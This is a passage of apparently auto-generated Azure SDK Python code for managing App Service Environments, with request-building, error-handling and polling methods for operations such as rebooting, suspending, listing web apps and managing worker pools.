def reboot( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> None:
"""Reboot all machines in an App Service Environment.
Reboot all machines in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
request = build_reboot_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.reboot.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reboot.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot"} # type: ignore
def _resume_initial(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._resume_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_resume_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume"} # type: ignore
@distributed_trace
def begin_resume(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Resume an App Service Environment.
Resume an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.begin_resume.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_resume_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._resume_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_resume.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume"} # type: ignore
@distributed_trace
def list_app_service_plans(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.AppServicePlanCollection]:
"""Get all App Service plans in an App Service Environment.
Get all App Service plans in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServicePlanCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServicePlanCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServicePlanCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_app_service_plans_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_app_service_plans.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_app_service_plans_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServicePlanCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_app_service_plans.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms"} # type: ignore
@distributed_trace
def list_web_apps(
self,
resource_group_name: str,
name: str,
properties_to_include: Optional[str] = None,
**kwargs: Any
) -> Iterable[_models.WebAppCollection]:
"""Get all apps in an App Service Environment.
Get all apps in an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param properties_to_include: Comma separated list of app properties to include. Default value
is None.
:type properties_to_include: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebAppCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_apps_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
properties_to_include=properties_to_include,
template_url=self.list_web_apps.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_apps_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
properties_to_include=properties_to_include,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_apps.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites"} # type: ignore
def _suspend_initial(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._suspend_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_suspend_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend"} # type: ignore
@distributed_trace
def begin_suspend(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Suspend an App Service Environment.
Suspend an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.begin_suspend.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_suspend_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._suspend_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_suspend.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend"} # type: ignore
@distributed_trace
def list_usages(
self,
resource_group_name: str,
name: str,
filter: Optional[str] = None,
**kwargs: Any
) -> Iterable[_models.CsmUsageQuotaCollection]:
"""Get global usage metrics of an App Service Environment.
Get global usage metrics of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param filter: Return only usages/metrics specified in the filter. Filter conforms to odata
syntax. Example: $filter=(name.value eq 'Metric1' or name.value eq 'Metric2') and startTime eq
2014-01-01T00:00:00Z and endTime eq 2014-12-31T23:59:59Z and timeGrain eq
duration'[Hour|Minute|Day]'. Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CsmUsageQuotaCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.CsmUsageQuotaCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.CsmUsageQuotaCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
filter=filter,
template_url=self.list_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
filter=filter,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmUsageQuotaCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages"} # type: ignore
@distributed_trace
def list_worker_pools(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.WorkerPoolCollection]:
"""Get all worker pools of an App Service Environment.
Get all worker pools of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WorkerPoolCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WorkerPoolCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pools.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WorkerPoolCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pools.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools"} # type: ignore
@distributed_trace
def get_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Get properties of a worker pool.
Get properties of a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
request = build_get_worker_pool_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_worker_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
def _create_or_update_worker_pool_initial(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(worker_pool_envelope, 'WorkerPoolResource')
request = build_create_or_update_worker_pool_request_initial(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_worker_pool_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_worker_pool_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
@distributed_trace
def begin_create_or_update_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> LROPoller[_models.WorkerPoolResource]:
"""Create or update a worker pool.
Create or update a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param worker_pool_envelope: Properties of the worker pool.
:type worker_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either WorkerPoolResource or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_worker_pool_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
worker_pool_envelope=worker_pool_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
@distributed_trace
def update_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Create or update a worker pool.
Create or update a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param worker_pool_envelope: Properties of the worker pool.
:type worker_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
